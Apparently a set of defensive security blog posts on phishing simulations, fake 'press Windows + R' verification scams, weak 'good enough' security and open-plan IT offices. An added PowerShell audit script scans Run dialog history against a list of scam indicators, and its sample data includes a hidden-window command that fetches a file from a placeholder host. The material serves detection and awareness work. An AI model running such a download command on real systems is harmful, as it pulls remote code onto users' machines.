
Phishing simulation that actually teaches something


Everyone can be fooled, including experienced IT staff. The goal of a simulation is to build good habits and reduce click rates year over year, not to expose people. Ten fewer clicks in 2026 than in 2025 can represent a major improvement and a measurable reduction in risk.

Start with simple exercises that include clear warning signs to build confidence. Conduct these simple simulations regularly – they create awareness, and those who click on them should be prioritized for additional training. When a small group keeps clicking repeatedly, that’s where education needs to start. These users often highlight where communication, awareness, or process gaps still exist. This is exactly where things tend to go wrong in real situations.

Gradually increase the realism by removing the obvious errors and using internal context. Follow up repeated clicks with quick, friendly 1:1 guidance and short micro-training, not sanctions.

There’s no real value in designing a simulation that fools 99% of employees. People might learn something from it, but the result is usually frustration and low motivation. Most users can detect even highly convincing phishing attempts – if they get just a couple of minutes of proper guidance first.

A practical example that works well in training sessions:
An employee receives an email that appears to come from a logistics supplier. One wrong click opens a form for “account verification.” It looks harmless, but behind the form a small script installs a remote access tool. Within two hours, the attacker has reused the same credentials to reach a server containing customer information. It all started with one click – not with bad intent, just a moment of inattention.

The point isn’t to scare anyone, but to show how little it takes – and how much safer things become when emails are reported instead of clicked.

To help people spot them in practice, here are some common warning signs:

  • Unknown or mismatched sender: the email address doesn’t match the company name or domain.

  • Suspicious link preview: the destination domain is different from what the link text shows.

  • Requests for passwords or codes: no legitimate service will ever ask for credentials by email.

  • Urgent tone or threats: messages pushing immediate action often aim to trigger panic.

  • Unexpected or suspicious attachments: files you didn’t ask for, especially with names like “urgent_invoice.doc” or “security_update.zip”.

  • Strange or incomplete signature: a missing name, title, or contact info can signal a fake sender.

  • Unusual time of day: emails sent late at night, during weekends, or on holidays can be suspicious.

  • Unfamiliar tone or wording: the writing style doesn’t match how the person usually communicates.

  • Generic greeting: “Dear user” or “Hello colleague” instead of your actual name.

  • Inconsistent branding: logos, colors, or formatting that look slightly off.

  • Email marked as “external” but made to look internal: a trick often used to bypass the trust people place in internal mail.

  • Unusual requests: asking for gift cards, wire transfers, or sensitive internal data.

Spotting just one of these warning signs early can prevent a full-scale incident.

Phishing awareness is part of Zero Trust in practice — always verify, even if the sender looks familiar, and make reporting part of everyday security hygiene.

Building awareness isn’t about perfection — it’s about progress. Every report instead of a click makes the organization stronger and more resilient.

Fake verification scams: why “press Windows + R” is a trap



Introduction

No legitimate site asks you to press Windows + R and paste commands. This post explains the risk and how to prevent it.

What it is

Fake verification pages mimic CAPTCHA or security checks. They tell users to press Windows + R, paste a command, and press Enter — executing code copied to the clipboard.

How the attack works

The page copies a command to the clipboard. When pasted into Run, it executes via CMD or PowerShell and often downloads malware, opens a reverse shell, or steals credentials.

Why it succeeds

It abuses trust and urgency. Users think Run is harmless, the page looks official, and many endpoints still allow local command execution.

Mitigations (technical level)

  • Remove local admin rights.

  • Limit local execution with least-privilege access.

  • Block unknown or unsigned scripts with AppLocker or similar.

User training

  • Never paste commands from webpages into Run, terminal, or PowerShell.

  • Communicate this rule via your normal channels (meeting, chat, email).
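The Run dialog keeps a history of what was typed into it, so a defender can check whether anyone on an endpoint has already pasted one of these commands. The PowerShell script below is an added example, not part of the original post: it reads the per-user RunMRU registry key (an assumption about its layout is stated in the comments), scores each entry against a small list of heuristic indicators, and falls back to constructed sample entries when the key is absent.

```powershell
# Added example (not from the post): audit the Run dialog history (RunMRU)
# for commands typical of "paste this into Windows + R" scams.
# Assumption: each RunMRU value holds one entry suffixed with "\1", and
# "MRUList" lists the value names from most recent to oldest.

$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Heuristic indicators chosen for this example, not an exhaustive list.
$Indicators = @(
    'powershell', 'pwsh', 'cmd', 'mshta', 'wscript', 'cscript',
    '-enc', 'hidden', 'iwr', 'invoke-webrequest', 'curl',
    'http://', 'https://', 'iex', 'invoke-expression'
)

function Get-RunMruEntries {
    # Run history as plain strings, most recent first; empty if no key.
    if (-not (Test-Path $RunMruPath)) { return @() }
    $key = Get-ItemProperty -Path $RunMruPath
    if (-not $key.MRUList) { return @() }
    foreach ($letter in $key.MRUList.ToCharArray()) {
        $name = [string]$letter
        $raw  = $key.$name
        if ($raw) { $raw -replace '\\1$', '' }   # strip the trailing "\1"
    }
}

function Test-SuspiciousRunEntry {
    param([Parameter(Mandatory)][string]$Entry)
    $lower = $Entry.ToLowerInvariant()
    $hits  = @($Indicators | Where-Object { $lower.Contains($_) })
    # A single hit (e.g. "cmd") is normal admin use; two or more match the
    # scam pattern "interpreter + hidden window + download/encoded payload".
    [pscustomobject]@{
        Entry      = $Entry
        Indicators = $hits -join ','
        Suspicious = $hits.Count -ge 2
    }
}

# Constructed sample entries so the logic can be tried without a real key.
$Sample = @(
    'notepad',
    'ms-settings:',
    'powershell -w hidden -c iwr http://example.invalid/verify.txt'
)

$entries = @(Get-RunMruEntries)
if ($entries.Count -eq 0) { $entries = $Sample }
$entries | ForEach-Object { Test-SuspiciousRunEntry $_ } | Format-Table -AutoSize
```

The key lives under HKCU, so the script only sees history when it runs in the affected user's own session (for example as a logon script or an EDR live-response task); a flagged entry is a reason to pull the endpoint for a closer look, not proof of compromise by itself.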

Good enough cyber security – or do you want to be among the best?




A lot of people say they have good enough cyber security.
But in cyber security, good enough is often the first step toward not enough.

Is it an antivirus that scores average in tests, or one that ranks in the top three?
Is it using multi-factor authentication only for management, but not for the operations team?
Or a firewall that allows everything, just to make things work?

Many still believe that no one is interested in them.
But most attacks aren’t targeted – they’re automated.
They look for weak spots, and good enough is often exactly that.

We see it every week: an unpatched system, an old password, or an open rule that was never reviewed.
It works – until the day it doesn’t.

Think about it this way:
Would management say it’s fine to show up at work in swimwear twice a year,
while everyone else wears suits the rest of the time?
Probably not.
Dress code is 100% – not good enough.

Security should be treated the same way.
You either have control, or you don’t.
Good enough doesn’t protect you as well as it should – it only feels comfortable until something happens.

Threat actors don’t stop because you’re average,
but they might move on when you’re better than your neighbor.

The best organizations treat security as a competitive advantage.
They build trust, protect value, and show that quality doesn’t stop at minimum compliance.

Security isn’t about being perfect – it’s about getting a little better every week.
Attackers only need one weakness.
Your job is to close every one of them –
just like you lock every door when you leave the office, not nine out of ten.

So next time someone says good enough, ask:
Good enough for whom – you, or the attacker?

And remember: you don’t need big projects to improve.
Start small – update one system, tighten one firewall rule, remove one unnecessary access.
Do it every week.

Or take inspiration from a few simple CIS principles:

  • Know your assets. You can’t protect what you don’t know exists.

  • Keep systems updated. Most attacks exploit known vulnerabilities.

  • Limit access. Give only what’s needed – that’s how least privilege and Zero Trust start.

  • Log and monitor. What you don’t see, and don’t log, won’t be detected or stopped.

Real security isn’t built in a single project.
It’s built through small, consistent actions – logged, learned, and improved.
One step, one log, one improvement at a time.

And one more thing:
Don’t just choose the cheapest antivirus, firewall, or SOC provider.
Run your own tests and check the quality before you trust it –
unless you already know someone who has tested it thoroughly.

Good security isn’t about saving money; it’s about knowing what actually works.

Why IT departments should not sit in open-plan offices



Open-plan offices have become a trend in recent years. The idea is to promote collaboration, flexibility, and communication. And there is no doubt that this setup has benefits:

  • collaboration becomes easier, since you can quickly ask the colleague next to you

  • knowledge sharing happens naturally and informally

  • it builds team spirit and a sense of community

  • communication flows faster, and problems can often be solved on the spot

For many departments this can work well. But for an IT department, an open-plan office is directly risky.

The risks of open spaces

IT staff handle information that is critical to the business: system configurations, logs, network diagrams, and security incidents. When these tasks are carried out in an open office environment, the risk of unauthorized access increases significantly.

This is particularly important for functions such as the CISO or the Security Operations Center (SOC), where staff may be dealing with ongoing incidents, threat intelligence, or forensic data. Such information should never be visible or overheard in an environment where guests, contractors, or even other employees without clearance can pass by.

The classic example is “shoulder surfing” – someone glancing at sensitive content on a screen. Equally problematic is the risk that confidential conversations are overheard.

Another often overlooked risk is sound leakage: in open-plan offices, a customer on the phone may also hear conversations from nearby desks, unless very advanced headsets with strong noise isolation are used. This means sensitive discussions between colleagues can unintentionally be shared with external parties.

ISO 27001:2022 – why open-plan is a problem

ISO 27001:2022 highlights several controls that all point to the same issue: sensitive information must be protected from unauthorized access. Open-plan offices make this nearly impossible.

  • Physical security perimeters

  • Physical entry controls

  • Clear desk and clear screen

  • Information security in supplier relationships

Real-life scenarios show how quickly security can fail in relation to these controls:

  • a visitor waiting for a meeting can easily photograph notes, diagrams, or printouts left on a desk

  • a contractor or job candidate passing by may glimpse a screen just as someone opens an attachment, without realizing the first page contains confidential information

  • when an IT employee locks their computer to get a coffee or use the restroom, they may leave documents on their desk – one quick smartphone photo is enough to capture that information permanently

  • suppliers or service providers moving through the office may unintentionally gain visibility into data they should never have access to

It is also worth noting that other standards and frameworks – such as GDPR, NIS2, NIST, CIS Controls, and NSM grunnprinsipper (Norway) – point in the same direction, emphasizing the need for physical protection of sensitive information and controlled access to workplaces.

Other departments should also reconsider

It is not only IT that should think twice about open-plan setups. Departments handling sensitive information face similar risks, for example:

  • HR – managing personal data, employment contracts, and health-related information

  • Legal/Compliance – working with confidential documents and internal investigations

  • Finance – handling accounting, banking, and budget data

  • Executive/Strategy – discussing mergers, strategic plans, or other confidential information

  • Research & Development – working on products, designs, or innovations that may be patented or involve intellectual property

  • Customer support – handling customer records, tickets, and sometimes payment details

  • Project teams for mergers & acquisitions – where leaks can have major financial consequences

All these functions risk exposing information if their workspaces are too open and accessible.

Real-world observations

When walking the streets of Oslo or Bergen, I often see offices on the ground floor with large windows facing the street. It is surprising how easy it is to see what people are working on. With today’s smartphone cameras, it takes no effort to take pictures or record video from the sidewalk – or even from a hotel room across the street.

The question is: do these companies think about security at all? It is frighteningly easy for outsiders to gain insight into customer data, accounting systems, or even online banking screens.

Conclusion

Open-plan offices can bring real benefits such as collaboration, flexibility, and stronger team dynamics. But for departments dealing with sensitive information – especially IT – the risks outweigh the benefits.

An IT department should therefore never sit in an open-plan office if guests, contractors, or even passersby can gain visibility. The same applies to HR, Legal, Finance, R&D, Customer Support, and Executive functions.

Physical segregation is not only common sense – it is a requirement for ISO 27001 compliance and a cornerstone of a strong security culture.